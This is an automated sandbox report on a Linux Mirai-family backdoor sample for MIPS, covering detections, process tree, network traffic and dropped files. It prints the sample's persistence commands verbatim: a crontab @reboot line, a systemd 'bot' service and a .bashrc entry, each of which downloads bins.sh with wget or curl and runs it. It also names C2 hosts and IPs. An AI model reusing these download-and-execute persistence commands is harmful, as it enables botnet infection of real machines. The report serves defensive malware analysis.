Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
mipsel.elf

Overview

General Information

Sample name:mipsel.elf
Analysis ID:1558939
MD5:bdf20281cdc4d40edabf85e3edc4e6d8
SHA1:3305c71c940aab3a0e255cf3a09e3e481a0bf865
SHA256:164676646c90c920424563898710ffffd50cedac7b1b4d588b52527112e7c2c8
Tags:elfuser-abuse_ch
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Executes the "crontab" command typically for achieving persistence
Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions
Sample tries to persist itself using cron
Creates hidden files and/or directories
Detected non-DNS traffic on DNS port
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Reads the 'hosts' file potentially containing internal network hosts
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1558939
Start date and time:2024-11-20 00:56:15 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 38s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:mipsel.elf
Detection:MAL
Classification:mal68.troj.linELF@0/4@31/0
  • Excluded domains from analysis (whitelisted): 15.2.168.192.in-addr.arpa
Command:/tmp/mipsel.elf
PID:5528
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
we kinda rocking ngl
Standard Error:
  • system is lnxubuntu20
  • mipsel.elf (PID: 5528, Parent: 5447, MD5: 0d6f61f82cf2f781c6eb0661071d42d9) Arguments: /tmp/mipsel.elf
    • mipsel.elf New Fork (PID: 5530, Parent: 5528)
      • sh (PID: 5540, Parent: 5530, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
        • sh New Fork (PID: 5542, Parent: 5540)
          • sh New Fork (PID: 5544, Parent: 5542)
          • crontab (PID: 5544, Parent: 5542, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
          • sh New Fork (PID: 5545, Parent: 5542)
          • chmod (PID: 5545, Parent: 5542, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x bins.sh
          • sh New Fork (PID: 5546, Parent: 5542)
          • sh (PID: 5546, Parent: 5542, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh bins.sh
          • sh New Fork (PID: 5547, Parent: 5542)
          • curl (PID: 5547, Parent: 5542, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh
          • sh New Fork (PID: 5550, Parent: 5542)
          • chmod (PID: 5550, Parent: 5542, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x bins.sh
        • sh (PID: 5542, Parent: 5540, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh bins.sh
        • sh New Fork (PID: 5543, Parent: 5540)
        • crontab (PID: 5543, Parent: 5540, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
      • sh (PID: 5551, Parent: 5530, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "/bin/systemctl enable bot"
        • sh New Fork (PID: 5557, Parent: 5551)
        • systemctl (PID: 5557, Parent: 5551, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: /bin/systemctl enable bot
  • systemd New Fork (PID: 5559, Parent: 5558)
  • snapd-env-generator (PID: 5559, Parent: 5558, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: mipsel.elfAvira: detected
Source: mipsel.elfReversingLabs: Detection: 34%
Source: mipsel.elfString: /proc//exe/proc/%d/cwd/var/tmp/proc/%d/fd.../proc/%d/fd/%s/proc/proc/%d/statr /root/mnt/dev/cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogmipsel->unknown%d/bin/busybox/bin/sh/var/Sofiatelnetd@
Source: mipsel.elfString: /bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
Source: mipsel.elfString: j2go/proc/net/tcp5.188.230.23137.18.73.94167.235.128.15168.191.23.13445.195.74.233141.94.21.7118.220.154.2118.210.151.8537.187.153.12745.195.74.1970123456789ABCDEF(crontab -l ; echo "@reboot %s") | crontab -/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"%s/.bashrca
Source: .bashrc.13.drString: /bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
Source: bot.service.13.drString: ExecStart=/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
Source: global trafficTCP traffic: 192.168.2.15:55762 -> 8.8.8.8:53
Source: global trafficTCP traffic: 192.168.2.15:55760 -> 8.8.8.8:53
Source: global trafficTCP traffic: 192.168.2.15:55752 -> 8.8.8.8:53
Source: global trafficTCP traffic: 192.168.2.15:55758 -> 8.8.8.8:53
Source: global trafficTCP traffic: 192.168.2.15:55756 -> 8.8.8.8:53
Source: /bin/curl (PID: 5547)Reads hosts file: /etc/hostsJump to behavior
Source: /tmp/mipsel.elf (PID: 5528)Socket: 127.0.0.1:4161Jump to behavior
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: host.zopz-api.com
Source: global trafficDNS traffic detected: DNS query: motd.ubuntu.com
Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
Source: tmp.kyAZ7l.23.drString found in binary or memory: http://serverip/bins/bins.sh
Source: bot.service.13.drString found in binary or memory: http://serverip/bins/bins.sh;
Source: Initial sampleString containing 'busybox' found: /bin/busybox
Source: Initial sampleString containing 'busybox' found: /proc//exe/proc/%d/cwd/var/tmp/proc/%d/fd.../proc/%d/fd/%s/proc/proc/%d/statr /root/mnt/dev/cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogmipsel->unknown%d/bin/busybox/bin/sh/var/Sofiatelnetd@
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal68.troj.linELF@0/4@31/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 5544)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
Source: /bin/sh (PID: 5543)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
Source: /tmp/mipsel.elf (PID: 5530)File written: /root/.bashrcJump to behavior
Source: /usr/bin/crontab (PID: 5543)File: /var/spool/cron/crontabs/tmp.kyAZ7lJump to behavior
Source: /usr/bin/crontab (PID: 5543)File: /var/spool/cron/crontabs/rootJump to behavior
Source: /tmp/mipsel.elf (PID: 5530)File: /root/.bashrcJump to behavior
Source: /bin/curl (PID: 5547)Directory: /root/.curlrcJump to behavior
Source: /tmp/mipsel.elf (PID: 5540)Shell command executed: sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"Jump to behavior
Source: /tmp/mipsel.elf (PID: 5551)Shell command executed: sh -c "/bin/systemctl enable bot"Jump to behavior
Source: /bin/sh (PID: 5545)Chmod executable: /usr/bin/chmod -> chmod +x bins.shJump to behavior
Source: /bin/sh (PID: 5550)Chmod executable: /usr/bin/chmod -> chmod +x bins.shJump to behavior
Source: /bin/sh (PID: 5557)Systemctl executable: /bin/systemctl -> /bin/systemctl enable botJump to behavior
Source: /tmp/mipsel.elf (PID: 5528)Queries kernel information via 'uname': Jump to behavior
Source: /bin/curl (PID: 5547)Queries kernel information via 'uname': Jump to behavior
Source: mipsel.elf, 5528.1.0000558fa359e000.0000558fa3646000.rw-.sdmp, mipsel.elf, 5530.1.0000558fa359e000.0000558fa3646000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mipsel
Source: mipsel.elf, 5528.1.00007ffcda39d000.00007ffcda3be000.rw-.sdmp, mipsel.elf, 5530.1.00007ffcda39d000.00007ffcda3be000.rw-.sdmpBinary or memory string: Yx86_64/usr/bin/qemu-mipsel/tmp/mipsel.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/mipsel.elf
Source: mipsel.elf, 5528.1.0000558fa359e000.0000558fa3646000.rw-.sdmp, mipsel.elf, 5530.1.0000558fa359e000.0000558fa3646000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/mipsel
Source: mipsel.elf, 5528.1.00007ffcda39d000.00007ffcda3be000.rw-.sdmp, mipsel.elf, 5530.1.00007ffcda39d000.00007ffcda3be000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mipsel
Source: mipsel.elf, 5530.1.00007ffcda39d000.00007ffcda3be000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid Accounts1
Scheduled Task/Job
1
Unix Shell Configuration Modification
1
Unix Shell Configuration Modification
1
File and Directory Permissions Modification
OS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Non-Application Layer Protocol
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Systemd Service
1
Systemd Service
1
Hidden Files and Directories
LSASS Memory1
File and Directory Discovery
Remote Desktop ProtocolData from Removable Media1
Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Scheduled Task/Job
1
Scheduled Task/Job
Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron2
Scripting
Login HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1558939 Sample: mipsel.elf Startdate: 20/11/2024 Architecture: LINUX Score: 68 47 host.zopz-api.com 172.111.38.48, 1290, 51012 INCERO-HVVCUS Reserved 2->47 49 motd.ubuntu.com 2->49 51 daisy.ubuntu.com 2->51 55 Antivirus / Scanner detection for submitted sample 2->55 57 Multi AV Scanner detection for submitted file 2->57 10 mipsel.elf 2->10         started        12 systemd snapd-env-generator 2->12         started        signatures3 process4 process5 14 mipsel.elf 10->14         started        file6 45 /root/.bashrc, ASCII 14->45 dropped 63 Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions 14->63 18 mipsel.elf sh 14->18         started        20 mipsel.elf sh 14->20         started        22 mipsel.elf 14->22         started        24 2 other processes 14->24 signatures7 process8 process9 26 sh crontab 18->26         started        30 sh sh 18->30         started        32 sh systemctl 20->32         started        file10 43 /var/spool/cron/crontabs/tmp.kyAZ7l, ASCII 26->43 dropped 59 Sample tries to persist itself using cron 26->59 61 Executes the "crontab" command typically for achieving persistence 26->61 34 sh crontab 30->34         started        37 sh chmod 30->37         started        39 sh sh 30->39         started        41 2 other processes 30->41 signatures11 process12 signatures13 53 Executes the "crontab" command typically for achieving persistence 34->53

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
mipsel.elf34%ReversingLabsLinux.Backdoor.Mirai
mipsel.elf100%AviraEXP/ELF.Mirai.W
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
host.zopz-api.com
172.111.38.48
truefalse
    unknown
    daisy.ubuntu.com
    unknown
    unknownfalse
      high
      motd.ubuntu.com
      unknown
      unknownfalse
        high
        NameSourceMaliciousAntivirus DetectionReputation
        http://serverip/bins/bins.shtmp.kyAZ7l.23.drfalse
          high
          http://serverip/bins/bins.sh;bot.service.13.drfalse
            high
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            172.111.38.48
            host.zopz-api.comReserved
            54540INCERO-HVVCUSfalse
            No context
            No context
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            INCERO-HVVCUScIhVfU4Bus.elfGet hashmaliciousMiraiBrowse
            • 172.110.25.149
            b2bXo6vmDm.exeGet hashmaliciousSystemBCBrowse
            • 23.29.124.10
            https://auth-start-treizor.github.io/Get hashmaliciousUnknownBrowse
            • 23.227.176.186
            https://ambassadorlimo.comGet hashmaliciousUnknownBrowse
            • 198.99.138.98
            https://ambassadorlimo.com/Get hashmaliciousUnknownBrowse
            • 198.99.138.98
            https://link.edgepilot.com/s/58d339fb/mi_L0_elk0K48SZfFk6Q5A?u=http://www.ambassadorlimo.com/Get hashmaliciousUnknownBrowse
            • 198.99.138.98
            http://www.philmauer.com/Get hashmaliciousUnknownBrowse
            • 172.111.52.90
            http://loveevamk.lifeGet hashmaliciousUnknownBrowse
            • 172.111.38.73
            ychqRZFkZi.exeGet hashmaliciousQuasarBrowse
            • 209.182.234.69
            ychqRZFkZi.exeGet hashmaliciousQuasarBrowse
            • 209.182.234.69
            No context
            No context
            Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
            File Type:ASCII text
            Category:dropped
            Size (bytes):76
            Entropy (8bit):3.7627880354948586
            Encrypted:false
            SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
            MD5:D86A1F5765F37989EB0EC3837AD13ECC
            SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
            SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
            SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
            Malicious:false
            Reputation:moderate, very likely benign file
            Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
            Process:/tmp/mipsel.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):178
            Entropy (8bit):4.358630015292201
            Encrypted:false
            SSDEEP:3:C7exTAXWTHYMOduLWiHSH7zFUbKEVQRFQ4AXWTHYMOduLWiHc:yeGsHPirvFNBjwsHPiL
            MD5:C3685F292213652676F734AB36C060EE
            SHA1:1D05F7F6302EC60E7990DE4BBE9180C149EFC731
            SHA-256:D070C429D850B4BAAED03330B6F96C7473ED86D0D33A2FACCD11FB3325767C4C
            SHA-512:7AC7D9594C8A4F0160FF9AAE92F7A1EFDFDB933EE3006DCCAC910C79F6FC529AF07B8DF9DAD16E8C21EC3DEF5C5AB9168E4994AE87EDE23E7D4A20F2E7178295
            Malicious:true
            Reputation:moderate, very likely benign file
            Preview:./bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh".
            Process:/tmp/mipsel.elf
            File Type:ASCII text
            Category:dropped
            Size (bytes):356
            Entropy (8bit):4.9110117370593995
            Encrypted:false
            SSDEEP:6:z872KstRZAMg8uko4dj2+feGsHPirvFNBjwsHPiFLnLQmWA4Rv:zE2ltRZAXsQ+GGmPirvFNBjwmPipLHW7
            MD5:F03C70CD4C61A1852F9E19B8FB0D639C
            SHA1:A6C078FFFFDF05C4C47B273B24E6B3FF4EF7E008
            SHA-256:AE50A3052A395987A2779DEB9253D4AA8638F2F8B1CDA7DF9039388F21BE7A90
            SHA-512:6277FBBFFCDD72FC3712721525538AC07FC46D290EBB02BE34CEF52B3E62BFA8A66F4E834D364D220108C815192E391AD986F05662FCBFAE674417507F4BCC20
            Malicious:false
            Reputation:moderate, very likely benign file
            Preview:[Unit].Description=My Miscellaneous Service.After=network.target..[Service].Type=simple.User=root.WorkingDirectory=/tmp.ExecStart=/bin/bash -c "/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh".Restart=no..[Install].WantedBy=multi-user.target.
            Process:/usr/bin/crontab
            File Type:ASCII text
            Category:dropped
            Size (bytes):235
            Entropy (8bit):5.104158129595515
            Encrypted:false
            SSDEEP:6:SUrpqoqQjEOP1KmREJOBFQLvamuZHGMQ5UYLtCFt3HY8jsHB:8QjHig8mmqeHLUHY8mB
            MD5:D44BADE6FD643ECE44BA05AA097B89D6
            SHA1:A431A237D6C77798FE8E433FA691E6B4DFAE5020
            SHA-256:34DF6E7AD21D72F9F78A822D3A8F1AC2027A873CFEE6B94588FE246EA0C5E6CD
            SHA-512:8C6940C8EC55B4D7E9B2A5C3FAD2D26D712EE8D712DF00D18E674FCB3B819B599BF1101D36A66FEFAB98E9C88B4F8C7FDC1267E92306980A12859E00D217C5E1
            Malicious:true
            Reputation:low
            Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Tue Nov 19 17:57:09 2024).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot /bin/bash -c /bin/wget http://serverip/bins/bins.sh.
            File type:ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
            Entropy (8bit):5.512251414843498
            TrID:
            • ELF Executable and Linkable format (generic) (4004/1) 100.00%
            File name:mipsel.elf
            File size:101'064 bytes
            MD5:bdf20281cdc4d40edabf85e3edc4e6d8
            SHA1:3305c71c940aab3a0e255cf3a09e3e481a0bf865
            SHA256:164676646c90c920424563898710ffffd50cedac7b1b4d588b52527112e7c2c8
            SHA512:e99905249aa98a888c786b627c9059c2499cf925d2b45af3754ff25964bd5a3ee9d3bc97bb90713fa1c26587d679d570a9e1638ad1e2d03782eb23ec25c39470
            SSDEEP:1536:sMDfnxMfcvWHeGX6y5IFF8kA9zLtU5NlZe/NhySRCFvGVy:sM7xMfcvWX5ntINlKCvGVy
            TLSH:10A3E706BF514FB7D86BDC7706F90B1128CCA81B26A92B75B434EC58B60B28B16D3974
            File Content Preview:.ELF....................`.@.4... .......4. ...(...............@...@..f...f...............p...pE..pE.X....l..........Q.td...............................<|..'!......'.......................<X..'!... .........9'.. ........................<(..'!............M9

            ELF header

            Class:ELF32
            Data:2's complement, little endian
            Version:1 (current)
            Machine:MIPS R3000
            Version Number:0x1
            Type:EXEC (Executable file)
            OS/ABI:UNIX - System V
            ABI Version:0
            Entry Point Address:0x400260
            Flags:0x1007
            ELF Header Size:52
            Program Header Offset:52
            Program Header Size:32
            Number of Program Headers:3
            Section Header Offset:100384
            Section Header Size:40
            Number of Section Headers:17
            Header String Table Index:16
            NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
            NULL0x00x00x00x00x0000
            .initPROGBITS0x4000940x940x8c0x00x6AX004
            .textPROGBITS0x4001200x1200x14d100x00x6AX0016
            .finiPROGBITS0x414e300x14e300x5c0x00x6AX004
            .rodataPROGBITS0x414e900x14e900x18400x00x2A0016
            .eh_framePROGBITS0x4166d00x166d00x40x00x2A004
            .ctorsPROGBITS0x4570000x170000x80x00x3WA004
            .dtorsPROGBITS0x4570080x170080x80x00x3WA004
            .jcrPROGBITS0x4570100x170100x40x00x3WA004
            .data.rel.roPROGBITS0x4570140x170140x240x00x3WA004
            .dataPROGBITS0x4570400x170400x3e00x00x3WA0016
            .gotPROGBITS0x4574200x174200x6380x40x10000003WAp0016
            .sbssNOBITS0x457a580x17a580x140x00x10000003WAp004
            .bssNOBITS0x457a700x17a580x62400x00x3WA0016
            .commentPROGBITS0x00x17a580xd4a0x00x0001
            .mdebug.abi32PROGBITS0xd4a0x187a20x00x00x0001
            .shstrtabSTRTAB0x00x187a20x7c0x00x0001
            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
            LOAD0x00x4000000x4000000x166d40x166d45.56260x5R E0x10000.init .text .fini .rodata .eh_frame
            LOAD0x170000x4570000x4570000xa580x6cb03.88340x6RW 0x10000.ctors .dtors .jcr .data.rel.ro .data .got .sbss .bss
            GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
            TimestampSource PortDest PortSource IPDest IP
            Nov 20, 2024 00:57:05.894556046 CET5575253192.168.2.158.8.8.8
            Nov 20, 2024 00:57:10.118293047 CET5575253192.168.2.158.8.8.8
            Nov 20, 2024 00:57:18.353688955 CET5575653192.168.2.158.8.8.8
            Nov 20, 2024 00:57:19.366024971 CET5575653192.168.2.158.8.8.8
            Nov 20, 2024 00:57:21.381982088 CET5575653192.168.2.158.8.8.8
            Nov 20, 2024 00:57:25.477853060 CET5575653192.168.2.158.8.8.8
            Nov 20, 2024 00:57:44.353009939 CET5575853192.168.2.158.8.8.8
            Nov 20, 2024 00:57:45.381325006 CET5575853192.168.2.158.8.8.8
            Nov 20, 2024 00:57:47.397267103 CET5575853192.168.2.158.8.8.8
            Nov 20, 2024 00:57:51.589163065 CET5575853192.168.2.158.8.8.8
            Nov 20, 2024 00:57:59.852740049 CET5576053192.168.2.158.8.8.8
            Nov 20, 2024 00:58:00.868880033 CET5576053192.168.2.158.8.8.8
            Nov 20, 2024 00:58:02.884965897 CET5576053192.168.2.158.8.8.8
            Nov 20, 2024 00:58:06.948771000 CET5576053192.168.2.158.8.8.8
            Nov 20, 2024 00:58:15.352231026 CET5576253192.168.2.158.8.8.8
            Nov 20, 2024 00:58:16.356590033 CET5576253192.168.2.158.8.8.8
            Nov 20, 2024 00:58:18.372456074 CET5576253192.168.2.158.8.8.8
            Nov 20, 2024 00:58:22.564570904 CET5576253192.168.2.158.8.8.8
            Nov 20, 2024 00:59:00.490073919 CET510121290192.168.2.15172.111.38.48
            Nov 20, 2024 00:59:00.495740891 CET129051012172.111.38.48192.168.2.15
            Nov 20, 2024 00:59:00.496016026 CET510121290192.168.2.15172.111.38.48
            Nov 20, 2024 00:59:00.497795105 CET510121290192.168.2.15172.111.38.48
            Nov 20, 2024 00:59:00.502938032 CET129051012172.111.38.48192.168.2.15
            Nov 20, 2024 00:59:00.953301907 CET129051012172.111.38.48192.168.2.15
            Nov 20, 2024 00:59:00.953823090 CET510121290192.168.2.15172.111.38.48
            Nov 20, 2024 00:59:01.087191105 CET129051012172.111.38.48192.168.2.15
            Nov 20, 2024 00:59:01.087707043 CET510121290192.168.2.15172.111.38.48
            Nov 20, 2024 00:59:01.087953091 CET510121290192.168.2.15172.111.38.48
            Nov 20, 2024 00:59:01.093518019 CET129051012172.111.38.48192.168.2.15
            Nov 20, 2024 00:59:05.953819990 CET129051012172.111.38.48192.168.2.15
            Nov 20, 2024 00:59:05.954281092 CET510121290192.168.2.15172.111.38.48
            Nov 20, 2024 00:59:05.954355955 CET510121290192.168.2.15172.111.38.48
            Nov 20, 2024 00:59:05.959551096 CET129051012172.111.38.48192.168.2.15
            Nov 20, 2024 00:59:05.959803104 CET510121290192.168.2.15172.111.38.48
            Nov 20, 2024 00:59:05.965153933 CET129051012172.111.38.48192.168.2.15
            Nov 20, 2024 00:59:10.954204082 CET129051012172.111.38.48192.168.2.15
            Nov 20, 2024 00:59:10.954396009 CET510121290192.168.2.15172.111.38.48
            Nov 20, 2024 00:59:10.954488039 CET510121290192.168.2.15172.111.38.48
            Nov 20, 2024 00:59:10.959924936 CET129051012172.111.38.48192.168.2.15
            Nov 20, 2024 00:59:10.960030079 CET510121290192.168.2.15172.111.38.48
            Nov 20, 2024 00:59:10.965389013 CET129051012172.111.38.48192.168.2.15
            TimestampSource PortDest PortSource IPDest IP
            Nov 20, 2024 00:57:10.281671047 CET5830253192.168.2.151.1.1.1
            Nov 20, 2024 00:57:13.105171919 CET3728253192.168.2.151.1.1.1
            Nov 20, 2024 00:57:14.814310074 CET3709753192.168.2.151.1.1.1
            Nov 20, 2024 00:57:14.814310074 CET5757053192.168.2.151.1.1.1
            Nov 20, 2024 00:57:15.291449070 CET4252753192.168.2.151.1.1.1
            Nov 20, 2024 00:57:19.818146944 CET3709753192.168.2.151.1.1.1
            Nov 20, 2024 00:57:20.294725895 CET3788053192.168.2.151.1.1.1
            Nov 20, 2024 00:57:24.853466034 CET3709753192.168.2.151.1.1.1
            Nov 20, 2024 00:57:25.318486929 CET5709453192.168.2.151.1.1.1
            Nov 20, 2024 00:57:28.603434086 CET3948553192.168.2.158.8.8.8
            Nov 20, 2024 00:57:30.103337049 CET3709753192.168.2.151.1.1.1
            Nov 20, 2024 00:57:30.322328091 CET3759353192.168.2.151.1.1.1
            Nov 20, 2024 00:57:33.853220940 CET3948553192.168.2.158.8.8.8
            Nov 20, 2024 00:57:35.353162050 CET3709753192.168.2.151.1.1.1
            Nov 20, 2024 00:57:39.103084087 CET3948553192.168.2.158.8.8.8
            Nov 20, 2024 00:57:40.603032112 CET3709753192.168.2.151.1.1.1
            Nov 20, 2024 00:57:45.852890968 CET3709753192.168.2.151.1.1.1
            Nov 20, 2024 00:57:54.602704048 CET5113553192.168.2.151.1.1.1
            Nov 20, 2024 00:57:55.329466105 CET3650453192.168.2.151.1.1.1
            Nov 20, 2024 00:58:00.333939075 CET5276853192.168.2.151.1.1.1
            Nov 20, 2024 00:58:05.337475061 CET4596253192.168.2.151.1.1.1
            Nov 20, 2024 00:58:10.102507114 CET5832353192.168.2.151.1.1.1
            Nov 20, 2024 00:58:10.344284058 CET5582153192.168.2.151.1.1.1
            Nov 20, 2024 00:58:15.350584030 CET3831453192.168.2.151.1.1.1
            Nov 20, 2024 00:58:25.602057934 CET5316653192.168.2.151.1.1.1
            Nov 20, 2024 00:58:30.851918936 CET4866753192.168.2.158.8.8.8
            Nov 20, 2024 00:58:40.356251955 CET4486053192.168.2.151.1.1.1
            Nov 20, 2024 00:58:45.362133026 CET3757753192.168.2.151.1.1.1
            Nov 20, 2024 00:58:50.364598036 CET3795253192.168.2.151.1.1.1
            Nov 20, 2024 00:58:55.369680882 CET3806353192.168.2.151.1.1.1
            Nov 20, 2024 00:59:00.372886896 CET4140453192.168.2.151.1.1.1
            Nov 20, 2024 00:59:00.486759901 CET53414041.1.1.1192.168.2.15
